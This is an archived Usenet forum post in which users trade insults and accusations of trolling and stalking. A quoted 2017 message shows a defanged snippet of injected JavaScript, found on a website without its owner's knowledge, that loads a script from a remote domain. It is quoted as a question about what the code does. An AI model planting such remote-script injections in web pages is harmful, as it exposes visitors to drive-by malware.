John Doe[_8_]
external usenet poster
 
Posts: 2,378
Default Char Jackson - a reminder! (was - Insider 16215)

Chronic nym-shifting psychopath troll...

--
"David B." wrote:

Path: eternal-september.org!reader01.eternal-september.org!feeder.eternal-september.org!border1.nntp.ams1.giganews.com!nntp. giganews.com!newsfeed.xs4all.nl!newsfeed7.news.xs4 all.nl!85.12.16.68.MISMATCH!peer01.ams1!peer.ams1. xlned.com!news.xlned.com!peer01.fr7!futter-mich.highwinds-media.com!news.highwinds-media.com!fx25.fr7.POSTED!not-for-mail
Subject: Char Jackson - a reminder! (was - Insider 16215)
Newsgroups: alt.comp.os.windows-10,alt.computer.workshop
References:
From: "David B."
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:60.0) Gecko/20100101 Thunderbird/60.6.1
MIME-Version: 1.0
In-Reply-To:
Content-Type: text/plain; charset=utf-8; format=flowed
Content-Language: en-US
Content-Transfer-Encoding: 8bit
Lines: 43
Message-ID:
X-Complaints-To:
NNTP-Posting-Date: Tue, 21 May 2019 07:46:46 UTC
Organization: blocknews -
www.blocknews.net
Date: Tue, 21 May 2019 08:46:42 +0100
X-Received-Bytes: 2664
X-Received-Body-CRC: 1686140018
X-Original-Bytes: 2488
Xref: reader01.eternal-september.org alt.comp.os.windows-10:95132 alt.computer.workshop:18422

On 15/06/2017 16:23, David B. wrote:
On 15/06/2017 15:49, Char Jackson wrote:
On Sun, 11 Jun 2017 19:48:54 +0100, "David B."
wrote:

Philo, whilst we are chatting about scripts, have you any notion of why
this would be on a web site (without the knowledge of the site owner)?


!-- [if IE]
scƒ ript type="text/javascript"
src=hxxp://windows-web-browsers.co.cc/alert/"
/ scƒ ript
!-- [endif]--
div IE scƒ ript here /div

Your 'best guess' will do!

TIA

Nice! First, engage in a bit of (fake) friendly banter, then smoothly
slip in an innocent-looking request for stalking assistance. That's a
great model, but where have we seen it before? Oh, that's right, it's
what you always do.


Nothing fake in our relationship, Char. Truly! :-)

Philo has been a Facebook friend of mine for years. I've purchased his
book of photographs AND the book of paintings published by his wife.

If you'd like a copy of Philo's book , it's available from Amazon, he-

https://www.amazon.com/Kochanskis-Co...dp/1466441682/


You might enjoy this item about Colleen and her work:-

http://shepherdexpress.com/article-2...d-express.html


HTH :-D

--
David B.
Devon, UK



 




Thread Tools
Display Modes Rate This Thread
Rate This Thread:

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off






All times are GMT +1. The time now is 08:37 PM.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright ©2004-2024 PCbanter.
The comments are property of their posters.